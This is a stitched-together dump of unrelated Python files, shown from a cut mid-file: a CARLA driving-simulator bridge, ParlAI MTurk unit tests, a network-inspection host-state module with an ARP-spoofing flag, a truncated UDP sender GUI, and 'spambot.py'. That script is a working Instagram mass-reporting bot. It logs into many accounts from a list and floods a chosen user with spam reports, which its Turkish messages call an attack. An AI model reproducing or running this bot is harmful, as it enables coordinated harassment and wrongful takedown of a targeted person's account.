self.vipc_server.send(VisionStreamType.VISION_STREAM_ROAD, yuv.data.tobytes(), self.frame_id, eof, eof)
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"transform": [1.0, 0.0, 0.0,
0.0, 1.0, 0.0,
0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
self.frame_id += 1
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['pandaStates'])
while not exit_event.is_set():
dat = messaging.new_message('pandaStates', 1)
dat.valid = True
dat.pandaStates[0] = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaStates', dat)
time.sleep(0.5)
def peripheral_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['peripheralState'])
while not exit_event.is_set():
dat = messaging.new_message('peripheralState')
dat.valid = True
# fake peripheral state data
dat.peripheralState = {
'pandaType': log.PandaState.PandaType.blackPanda,
'voltage': 12000,
'current': 5678,
'fanSpeedRpm': 1000
}
pm.send('peripheralState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"timestamp": int(time.time() * 1000),
"flags": 1, # valid fix
"accuracy": 1.0,
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"bearingAccuracyDeg": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"speed": vehicle_state.speed,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
def fake_driver_monitoring(exit_event: threading.Event):
pm = messaging.PubMaster(['driverState', 'driverMonitoringState'])
while not exit_event.is_set():
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs: VehicleState, exit_event: threading.Event):
i = 0
while not exit_event.is_set():
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i += 1
def bridge(q):
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
settings = world.get_settings()
settings.synchronous_mode = True # Enables synchronous mode
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
world.set_weather(carla.WeatherParameters.ClearSunset)
if args.low_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
world.unload_map_layer(carla.MapLayer.Particles)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
spawn_point = spawn_points[args.num_selected_spawn_point]
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '40')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camerad = Camerad()
camera.listen(camerad.cam_callback)
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
# launch fake car threads
threads = []
exit_event = threading.Event()
threads.append(threading.Thread(target=panda_state_function, args=(exit_event,)))
threads.append(threading.Thread(target=peripheral_state_function, args=(exit_event,)))
threads.append(threading.Thread(target=fake_driver_monitoring, args=(exit_event,)))
threads.append(threading.Thread(target=can_function_runner, args=(vehicle_state, exit_event,)))
for t in threads:
t.start()
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 # keyboard signal is always 1
brake_manual_multiplier = 0.7 # keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO # keyboard signal is always 1
while True:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "quit":
break
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
if is_openpilot_engaged:
sm.update(0)
# TODO gas and brake is deprecated
throttle_op = clip(sm['carControl'].actuators.accel / 1.6, 0.0, 1.0)
brake_op = clip(-sm['carControl'].actuators.accel / 4.0, 0.0, 1.0)
steer_op = sm['carControl'].actuators.steeringAngleDeg
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
else:
if throttle_out == 0 and old_throttle > 0:
if throttle_ease_out_counter > 0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out == 0 and old_brake > 0:
if brake_ease_out_counter > 0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out == 0 and old_steer != 0:
if steer_ease_out_counter > 0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1, 1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out / 0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
if rk.frame % PRINT_DECIMATION == 0:
print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
if rk.frame % 5 == 0:
world.tick()
rk.keep_time()
# Clean up resources in the opposite order they were created.
exit_event.set()
for t in reversed(threads):
t.join()
gps.destroy()
imu.destroy()
camera.destroy()
vehicle.destroy()
def bridge_keep_alive(q: Any):
while 1:
try:
bridge(q)
break
except RuntimeError:
print("Restarting bridge...")
if __name__ == "__main__":
# make sure params are in a good state
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
q: Any = Queue()
p = Process(target=bridge_keep_alive, args=(q,), daemon=True)
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
p.join()
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
|
test_mturk_agent.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import unittest
import os
import time
import threading
from unittest import mock
from parlai.mturk.core.agents import MTurkAgent, AssignState
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.core.params import ParlaiParser
import parlai.mturk.core.worker_manager as WorkerManagerFile
import parlai.mturk.core.data_model as data_model
parent_dir = os.path.dirname(os.path.abspath(__file__))
WorkerManagerFile.DISCONNECT_FILE_NAME = 'disconnect-test.pickle'
WorkerManagerFile.MAX_DISCONNECTS = 1
WorkerManagerFile.parent_dir = os.path.dirname(os.path.abspath(__file__))
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_MESSAGE
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE, AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING, AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE, AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED, AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
class TestAssignState(unittest.TestCase):
"""Various unit tests for the AssignState class"""
def setUp(self):
self.agent_state1 = AssignState()
self.agent_state2 = AssignState(status=AssignState.STATUS_IN_TASK)
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt,
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
def tearDown(self):
self.mturk_manager.shutdown()
def test_assign_state_init(self):
'''Test proper initialization of assignment states'''
self.assertEqual(self.agent_state1.status, AssignState.STATUS_NONE)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(self.agent_state2.status, AssignState.STATUS_IN_TASK)
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
def test_message_management(self):
'''Test message management in an AssignState'''
# Ensure message appends succeed and are idempotent
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 1)
self.agent_state1.append_message(MESSAGE_2)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.agent_state1.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state1.get_messages()), 2)
self.assertEqual(len(self.agent_state2.get_messages()), 0)
self.assertIn(MESSAGE_1, self.agent_state1.get_messages())
self.assertIn(MESSAGE_2, self.agent_state1.get_messages())
self.assertEqual(len(self.agent_state1.message_ids), 2)
self.agent_state2.append_message(MESSAGE_1)
self.assertEqual(len(self.agent_state2.message_ids), 1)
# Ensure command interactions work as expected
self.agent_state1.set_last_command(COMMAND_1)
self.assertEqual(self.agent_state1.get_last_command(), COMMAND_1)
# Ensure clearing messages acts as intended and doesn't clear agent2
self.agent_state1.clear_messages()
self.assertEqual(len(self.agent_state1.messages), 0)
self.assertEqual(len(self.agent_state1.message_ids), 0)
self.assertIsNone(self.agent_state1.last_command)
self.assertEqual(len(self.agent_state2.message_ids), 1)
def test_state_handles_status(self):
'''Ensures status updates and is_final are valid'''
for status in statuses:
self.agent_state1.set_status(status)
self.assertEqual(self.agent_state1.get_status(), status)
for status in active_statuses:
self.agent_state1.set_status(status)
self.assertFalse(self.agent_state1.is_final())
for status in complete_statuses:
self.agent_state1.set_status(status)
self.assertTrue(self.agent_state1.is_final())
# TODO update the below once bonus is default
for status in complete_statuses:
self.agent_state1.set_status(status)
text, command = self.agent_state1.get_inactive_command_text()
self.assertIsNotNone(text)
self.assertIsNotNone(command)
class TestMTurkAgent(unittest.TestCase):
"""Various unit tests for the MTurkAgent class"""
def setUp(self):
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
self.opt = argparser.parse_args(print_args=False)
self.opt['task'] = 'unittest'
self.opt['assignment_duration_in_seconds'] = 6
mturk_agent_ids = ['mturk_agent_1']
self.mturk_manager = MTurkManager(
opt=self.opt.copy(),
mturk_agent_ids=mturk_agent_ids
)
self.worker_manager = self.mturk_manager.worker_manager
self.turk_agent = MTurkAgent(
self.opt.copy(), self.mturk_manager,
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1)
def tearDown(self):
self.mturk_manager.shutdown()
disconnect_path = os.path.join(parent_dir, 'disconnect-test.pickle')
if os.path.exists(disconnect_path):
os.remove(disconnect_path)
def test_init(self):
'''Test initialization of an agent'''
self.assertIsNotNone(self.turk_agent.creation_time)
self.assertIsNone(self.turk_agent.id)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertIsNone(self.turk_agent.conversation_id)
self.assertFalse(self.turk_agent.some_agent_disconnected)
self.assertFalse(self.turk_agent.hit_is_expired)
self.assertFalse(self.turk_agent.hit_is_abandoned)
self.assertFalse(self.turk_agent.hit_is_returned)
self.assertFalse(self.turk_agent.hit_is_complete)
self.assertFalse(self.turk_agent.disconnected)
self.assertTrue(self.turk_agent.alived)
def test_state_wrappers(self):
'''Test the mturk agent wrappers around its state'''
for status in statuses:
self.turk_agent.set_status(status)
self.assertEqual(self.turk_agent.get_status(), status)
for status in [
AssignState.STATUS_DONE,
AssignState.STATUS_PARTNER_DISCONNECT
]:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.submitted_hit())
for status in active_statuses:
self.turk_agent.set_status(status)
self.assertFalse(self.turk_agent.is_final())
for status in complete_statuses:
self.turk_agent.set_status(status)
self.assertTrue(self.turk_agent.is_final())
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 1)
self.turk_agent.append_message(MESSAGE_2)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.turk_agent.append_message(MESSAGE_1)
self.assertEqual(len(self.turk_agent.get_messages()), 2)
self.assertIn(MESSAGE_1, self.turk_agent.get_messages())
self.assertIn(MESSAGE_2, self.turk_agent.get_messages())
# Ensure command interactions work as expected
self.turk_agent.set_last_command(COMMAND_1)
self.assertEqual(self.turk_agent.get_last_command(), COMMAND_1)
self.turk_agent.clear_messages()
self.assertEqual(len(self.turk_agent.get_messages()), 0)
# In task checks
self.turk_agent.conversation_id = 't_12345'
self.assertTrue(self.turk_agent.is_in_task())
self.turk_agent.conversation_id = 'b_12345'
self.assertFalse(self.turk_agent.is_in_task())
def test_connection_id(self):
'''Ensure the connection_id hasn't changed'''
connection_id = "{}_{}".format(
self.turk_agent.worker_id, self.turk_agent.assignment_id)
self.assertEqual(self.turk_agent.get_connection_id(), connection_id)
def test_inactive_data(self):
'''Ensure data packet generated for inactive commands is valid'''
for status in complete_statuses:
self.turk_agent.set_status(status)
data = self.turk_agent.get_inactive_command_data()
self.assertIsNotNone(data['text'])
self.assertIsNotNone(data['inactive_text'])
self.assertEqual(
data['conversation_id'], self.turk_agent.conversation_id)
self.assertEqual(data['agent_id'], TEST_WORKER_ID_1)
def test_status_change(self):
has_changed = False
self.turk_agent.set_status(AssignState.STATUS_ONBOARDING)
def wait_for_status_wrap():
nonlocal has_changed # noqa 999 we don't use python2
self.turk_agent.wait_for_status(AssignState.STATUS_WAITING)
has_changed = True
t = threading.Thread(target=wait_for_status_wrap, daemon=True)
t.start()
self.assertFalse(has_changed)
time.sleep(0.07)
self.assertFalse(has_changed)
self.turk_agent.set_status(AssignState.STATUS_WAITING)
time.sleep(0.07)
self.assertTrue(has_changed)
def test_message_queue(self):
'''Ensure observations and acts work as expected'''
self.mturk_manager.send_message = mock.MagicMock()
self.turk_agent.observe(ACT_1)
self.mturk_manager.send_message.assert_called_with(
TEST_WORKER_ID_1, TEST_ASSIGNMENT_ID_1, ACT_1)
# First act comes through the queue and returns properly
self.assertTrue(self.turk_agent.msg_queue.empty())
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.recieved_packets[MESSAGE_ID_1])
self.assertFalse(self.turk_agent.msg_queue.empty())
returned_act = self.turk_agent.get_new_act_message()
self.assertEquals(returned_act, ACT_1)
# Repeat act is ignored
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
self.assertTrue(self.turk_agent.msg_queue.empty())
for i in range(100):
self.turk_agent.put_data(str(i), ACT_1)
self.assertEqual(self.turk_agent.msg_queue.qsize(), 100)
self.turk_agent.flush_msg_queue()
self.assertTrue(self.turk_agent.msg_queue.empty())
# Test non-act messages
blank_message = self.turk_agent.get_new_act_message()
self.assertIsNone(blank_message)
self.turk_agent.disconnected = True
disconnect_message = self.turk_agent.get_new_act_message()
self.turk_agent.disconnected = False
self.assertEqual(disconnect_message['text'],
self.turk_agent.MTURK_DISCONNECT_MESSAGE)
self.turk_agent.hit_is_returned = True
return_message = self.turk_agent.get_new_act_message()
self.assertEqual(
return_message['text'], self.turk_agent.RETURN_MESSAGE)
self.turk_agent.hit_is_returned = False
# Reduce state
self.turk_agent.reduce_state()
self.assertIsNone(self.turk_agent.msg_queue)
self.assertIsNone(self.turk_agent.recieved_packets)
def test_message_acts(self):
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
# non-Blocking check
self.assertIsNone(self.turk_agent.message_request_time)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
self.turk_agent.id = AGENT_ID
self.turk_agent.put_data(MESSAGE_ID_1, ACT_1)
returned_act = self.turk_agent.act(blocking=False)
self.assertIsNone(self.turk_agent.message_request_time)
self.assertEquals(returned_act, ACT_1)
self.mturk_manager.send_command.assert_called_once()
# non-Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.assertIsNotNone(self.turk_agent.message_request_time)
self.assertIsNone(returned_act)
while returned_act is None:
returned_act = self.turk_agent.act(timeout=0.07, blocking=False)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEquals(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
# Blocking timeout check
self.mturk_manager.send_command = mock.MagicMock()
self.mturk_manager.handle_turker_timeout = mock.MagicMock()
returned_act = self.turk_agent.act(timeout=0.07)
self.mturk_manager.send_command.assert_called_once()
self.mturk_manager.handle_turker_timeout.assert_called_once()
self.assertEquals(
returned_act['text'], self.turk_agent.TIMEOUT_MESSAGE)
if __name__ == '__main__':
unittest.main(buffer=True)
|
host_state.py
|
"""
Global shared state about the host.
"""
import threading
import utils
import time
import sys
CLIENT_VERSION = '1.0.3'
class HostState(object):
def __init__(self):
self.host_ip = None
self.host_mac = None
self.gateway_ip = None
self.packet_processor = None
self.user_key = None
self.secret_salt = None
self.client_version = CLIENT_VERSION
self.persistent_mode = True # Always persistent to remove local Flask
# The following objects might be modified concurrently.
self.lock = threading.Lock()
self.ip_mac_dict = {} # IP -> MAC
self.pending_dhcp_dict = {} # device_id -> hostname
self.pending_resolver_dict = {} # device_id -> resolver_ip
self.pending_dns_dict = {} # (device_id, domain) -> ip_set
self.pending_flow_dict = {} # flow_key -> flow_stats
self.pending_ua_dict = {} # device_id -> ua_set
self.pending_tls_dict_list = [] # List of tls_dict
self.pending_netdisco_dict = {} # device_id -> device_info_list
self.pending_syn_scan_dict = {} # device_id -> port_list
self.status_text = None
self.device_whitelist = []
self.has_consent = False
self.byte_count = 0
self.is_inspecting_traffic = True
self.fast_arp_scan = True # Persists for first 5 mins
self.last_ui_contact_ts = time.time() # ts of /is_inspecting_traffic
self.quit = False
self.spoof_arp = True
# Constantly checks for IP changes on this host
thread = threading.Thread(target=self.update_ip_thread)
thread.daemon = True
thread.start()
def set_ip_mac_mapping(self, ip, mac):
with self.lock:
self.ip_mac_dict[ip] = mac
def get_ip_mac_dict_copy(self):
with self.lock:
return dict(self.ip_mac_dict)
def is_inspecting(self):
with self.lock:
return self.is_inspecting_traffic
def update_ip_thread(self):
prev_gateway_ip = None
prev_host_ip = None
while True:
try:
self.gateway_ip, _, self.host_ip = utils.get_default_route()
except Exception:
pass
# Upon network changes, clear ARP cache.
if self.gateway_ip != prev_gateway_ip or \
self.host_ip != prev_host_ip:
with self.lock:
self.ip_mac_dict = {}
prev_gateway_ip = self.gateway_ip
prev_host_ip = self.host_ip
time.sleep(15)
|
spambot.py
|
from requests.sessions import Session
from requests import get
from random import choice
from multiprocessing import Process
from colorama import init,Style,Fore
BANNER = """
____ __ __ ____ _ _ _ __ __
/ ___| \ \ / / | __ ) | | | | | | \ \ / /
| | \ V / | _ \ | | | | | | \ V /
| |___ | | | |_) | | |_| | | |___ | |
\____| |_| |____/ \___/ |_____| |_|
"""
USER_AGENTS = ["Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0",
"Mozilla/5.0 (Android 4.4; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0",
"Mozilla/5.0 (Windows NT x.y; rv:10.0) Gecko/20100101 Firefox/10.0",
"Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0",
"Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"]
USER_AGENT = choice(USER_AGENTS)
class Client:
def __init__(self,username,password,proxy):
self.ses = Session()
self.loggedIn = False
self.username = username
self.password = password
self.proxy = proxy
def Login(self):
if self.loggedIn == True:
return None
loginData = {
"password":self.password,
"username":self.username,
"queryParams":"{}"
}
homePageResponse = self.ses.get("https://www.instagram.com/accounts/login/")
loginHeaders = {
"Accept":"*/*",
"Accept-Encoding":"gzip,deflate,br",
"Accept-Language":"en-US,en;q=0.5",
"Connection":"keep-alive",
"Content-Type":"application/x-www-form-urlencoded",
"Host":"www.instagram.com",
"Referer":"https://www.instagram.com/accounts/login/",
"X-Requested-With":"XMLHttpRequest",
"X-Instagram-AJAX":"1",
"User-Agent":USER_AGENT,
"X-CSRFToken":homePageResponse.cookies.get_dict()["csrftoken"],
}
loginCookies = {
"rur":"PRN",
"csrftoken":homePageResponse.cookies.get_dict()["csrftoken"],
"mcd":homePageResponse.cookies.get_dict()["mcd"],
"mid":homePageResponse.cookies.get_dict()["mid"]
}
self.ses.headers.update(loginHeaders)
self.ses.cookies.update(loginCookies)
loginPostResponse = self.ses.post("https://www.instagram.com/accounts/login/ajax/",data=loginData)
if loginPostResponse.status_code == 200 and loginPostResponse.json()["authenticated"] == True:
self.loggedIn = True
mainPageResponse = self.ses.get("https://www.instagram.com/")
self.ses.cookies.update(mainPageResponse.cookies)
def Spam(self,username,userid):
if self.loggedIn == False:
return None
link = "https://www.instagram.com/" + username + "/"
profileGetResponse = self.ses.get(link)
self.ses.cookies.update(profileGetResponse.cookies)
spamHeaders = {
"Accept":"*/*",
"Accept-Encoding":"gzip,deflate,br",
"Accept-Language":"en-US,en;q=0.5",
"Connection":"keep-alive",
"Content-Type":"application/x-www-form-urlencoded",
"DNT":"1",
"Host":"www.instagram.com",
"X-Instagram-AJAX":"2",
"X-Requested-With":"XMLHttpRequest",
"Referer":link,
"User-Agent":USER_AGENT,
"X-CSRFToken":profileGetResponse.cookies.get_dict()["csrftoken"],
}
spamData = {
"reason_id":"1",
"source_name":"profile"
}
self.ses.headers.update(spamHeaders)
spamPostResponse = self.ses.post("https://www.instagram.com/users/"+ userid +"/report/",data=spamData)
if spamPostResponse.status_code == 200 and spamPostResponse.json()["description"] == "Your reports help keep our community free of spam.":
self.ses.close()
return True
else:
return False
def Success(username,shit):
print(Fore.GREEN +"[" + username +"]" + Style.RESET_ALL
+ " " + shit)
def Fail(username,shit):
print(Fore.RED +"[" + username +"]" + Style.RESET_ALL
+ " " + shit)
def Status(shit):
print(Fore.YELLOW +"[ İnsta Spam ]" + Style.RESET_ALL
+ " " + shit)
def DoitAnakin(reportedGuy,reportedGuyID,username,password,proxy):
try:
insta = None
if proxy != None:
insta = Client(username,password,None)
else:
insta = Client(username,password,None)
insta.Login()
result = insta.Spam(reportedGuy,reportedGuyID)
if insta.loggedIn == True and result == True:
Success(username,"Başarıyla SPAM atıldı!")
elif insta.loggedIn == True and result == False:
Fail(username,"Giriş başarılı ama SPAM atılması başarısız!")
elif insta.loggedIn == False:
Fail(username,"Giriş başarısız!")
except:
Fail(username,"Giriş yapılırken hata oluştu!")
if __name__ == "__main__":
init()
userFile = open("userlist.txt","r")
USERS = []
for user in userFile.readlines():
if user.replace("\n","").replace("\r","\n") != "":
USERS.append(user.replace("\n","").replace("\r","\n"))
print(Fore.RED + BANNER + Style.RESET_ALL)
Status(str(len(USERS)) + " Adet Kullanıcı Yüklendi!\n")
reportedGuy = input(Fore.GREEN + "SPAM'lanacak Kişinin Kullanıcı Adı: " + Style.RESET_ALL)
reportedGuyID = input(Fore.GREEN + "SPAM'lanacak Kişinin User ID'si: " + Style.RESET_ALL)
print("")
Status("Saldırı başlatılıyor!\n")
for user in USERS:
p = Process(target=DoitAnakin,args=(reportedGuy,reportedGuyID,user.split(" ")[0],user.split(" ")[1],None))
p.start()
|
gui.py
|
import random
from multiprocessing import Process
from threading import Thread
from socket import *
from tkinter import *
from tkinter import ttk
from _thread import *
print(sys.version)
class SenderConnection:
def __init__(self):
self.host = None
self.port = None
self.addr = (self.host, self.port)
self.sock = socket(AF_INET, SOCK_DGRAM)
def send_data(self, data):
self.sock.sendto(data, self.addr)
def close(self):
self.close()
def set_host(self, host):
print(f'Host set to : {host}')
if host:
self.host = host
self.addr = (self.host, self.port)
def set_port(self, port):
print(f'Port set to : {port}')
if port:
self.port = port
self.addr = (self.host, self.port)
@staticmethod
def validate_host(host):
L=host.split('.')
if len(L)!=4:
return None
for i in L:
if not i.isdigit():return None
if not 0<=int(i)<=225:return None
return host
@staticmethod
def validate_port(port):
if port.isdigit:
port=int(port)
if 5000<=port<=25000:
return port
else:return None
class ReceiverConnection:
def __init__(self):
